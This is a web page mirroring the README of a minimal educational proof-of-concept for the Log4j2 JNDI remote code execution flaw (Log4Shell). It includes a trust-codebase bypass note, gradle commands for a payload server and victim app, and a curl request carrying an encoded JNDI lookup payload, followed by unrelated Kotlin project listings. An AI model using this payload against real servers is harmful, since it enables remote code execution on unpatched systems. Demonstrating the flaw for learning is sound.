A bare minimum proof-of-concept for Log4j2 JNDI RCE vulnerability (CVE-2021-44228/Log4Shell)

Sola

Last update: Aug 17, 2022

Related tags

App proof-of-concept poc rce log4j2 remote-code-execution cve-2021-44228 log4shell

Overview

Log4j2 RCE Vulnerability POC

A bare minimum proof-of-concept for Log4j2 JNDI Remote-Code-Execution vulnerability (CVE-2021-44228). This is intended for educational purposes to help people who are not security researchers to understand how it works and how large the impact is.

The POC bypasses the requirement for setting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase properties to true which were disabled by default since 8u121, 7u131, 6u141 .

Prerequisites

JDK 1.8

Note: JDK 1.8 is required for payload-server to compile, but the victim-app is vulnerable up until JDK 15 because the Nashorn engine was removed in JDK 15.

To Test

Start the payload-server by running:

$ ./gradlew runPayloadServer

Open a new terminal session then start the victim-app:

$ ./gradlew runVictimApp

Run curl http://localhost:8080/hello?name=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A8099%2Fexec%7D to trigger the RCE.
To proof the remote code has been executed, check the console log of victim-app. You should see an unintended log has been printed on the screen.

ZeAppp v3, created by Android enthusiasts joining the Droidcon 2021 in Berlin, coming to the GDG Booth and writing code, 15 minutes at a time

ZeThree App build at the GDG Community booth at Droidcon Berlin 2021. Come join the fun™. ZeWhat? Based on the previous success of the ZeAppp-app, thi

8 Sep 16, 2022

Lab5-soa (deadline 2021-12-17)

Web Engineering 2021-2022 / SOA In this assignment your PR must only modify the README.md file. Please, go to the Wiki in order to get the instruction

0 Nov 22, 2022

Koltin solutions for the 2021 edition of AoC

AdventOfCode2021 This is the code developed for Advent of Code 2021. My primary goals are: have fun learn something new about Kotlin don't spend more

0 Dec 1, 2021

My solutions for Advent of Code 2021 puzzles, mainly using Kotlin.

Advent of Code 2021 Featuring Kotlin What's that ? https://adventofcode.com/2021/about Advent of Code is an Advent calendar of small programming puzzl

0 Dec 2, 2021

My solutions for Advent of Code 2021, written in Kotlin!

Advent-of-Code-2021 Welcome to the Advent of Code1 Kotlin project created by thijsboehme using the Advent of Code Kotlin Template delivered by JetBrai

0 Dec 15, 2021

Kotlin fun with Advent of Code 2021

aoc-kotlin Welcome to the Advent of Code1 Kotlin project created by dayanruben using the Advent of Code Kotlin Template delivered by JetBrains. In thi

32 Dec 15, 2022

Advent of Code 2021 implementations in Kotlin

advent-of-code-in-kotlin-2021 Welcome to the Advent of Code1 Kotlin project created by acrane13 using the Advent of Code Kotlin Template delivered by

0 Dec 20, 2021

Advent of Code 2021: Solutions in Kotlin

Advent of Code 2021 Solutions in Kotlin This repo is my personal attempt at solving the Advent of Code 2021 set of problems with the Kotlin programmin

33 Nov 28, 2022

Advent of Code 2021, using Kotlin

Advent of Code 2021, using Kotlin See https://adventofcode.com/2021, https://kotlinlang.org/. See also "the official GitHub template" by JetBrains. Ge